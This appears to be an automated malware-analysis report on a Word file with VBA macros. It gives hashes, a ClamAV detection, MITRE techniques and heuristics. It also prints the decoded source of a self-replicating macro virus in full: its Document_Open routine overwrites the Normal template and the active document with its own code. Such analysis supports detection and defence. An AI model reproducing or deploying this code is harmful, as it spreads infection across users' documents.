Office (OLE) malware analysis — malicious · 1464a409ba3a5a17

MALICIOUS

Office (OLE)

27.5 KB Created: 2000-07-19 13:49:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: d7ec8223dcaa1430ce1777658bd46d28 SHA-1: 1f32f679781648bbacc41920580929119fa0e41a SHA-256: 1464a409ba3a5a1725f7f78e18373df4938eccbe78cbf4c286dbeec79ed65656

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro. This macro is designed to copy itself to the Normal template and active document, indicating an attempt to establish persistence or ensure execution. The ClamAV detection 'Doc.Trojan.Strings-1' suggests it's a known malicious document, likely a downloader or dropper.

Heuristics 3

ClamAV: Doc.Trojan.Strings-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Strings-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1307 bytes
SHA-256: `ea0737acf9a8a4454259bd65a670b5f9bd06a61bef5cdaef9ffaf1577e9d0e43`
Detection ClamAV: Doc.Trojan.Strings-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'e[ax] Private Sub Document_open() Dim KVICKJS, CHSJEUR, LCXJSIE, OCKAJRF, SIFDMXU Set CHSJEUR = ThisDocument.VBProject.VBComponents(1).CodeModule Set OCKAJRF = NormalTemplate.VBProject.VBComponents(1).CodeModule Set LCXJSIE = ActiveDocument.VBProject.VBComponents(1).CodeModule KVICKJS = Strings.Trim(CHSJEUR.lines(1, CHSJEUR.countoflines)) SIFDMXU = Strings.LCase("'e[ax]") If SIFDMXU <> OCKAJRF.lines(1, 1) Then With OCKAJRF .deletelines 1, OCKAJRF.countoflines .insertlines 1, KVICKJS End With End If If SIFDMXU <> LCXJSIE.lines(1, 1) Then With LCXJSIE .deletelines 1, LCXJSIE.countoflines .insertlines 1, KVICKJS End With End If 'WM97/2K.String by e[ax] 'SIM v1.0 [String Infection Method] by e[ax] 'Greetz: k04x, rudeboy, BIGFOOOT, E-man, SnakeLord, t[r]ax 'H4dija, te ostale pri BIHnet.ORG-u 'SP.greetz to: Jackie 2Fl0wer, KnowDeth, ASMhead, Mist, mort- 'nala, Giga, LifeWire, Fulvian, Evul, and to all ppl on #virus '10x once again for inspiration... 'VicES: Where ar u man!? End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.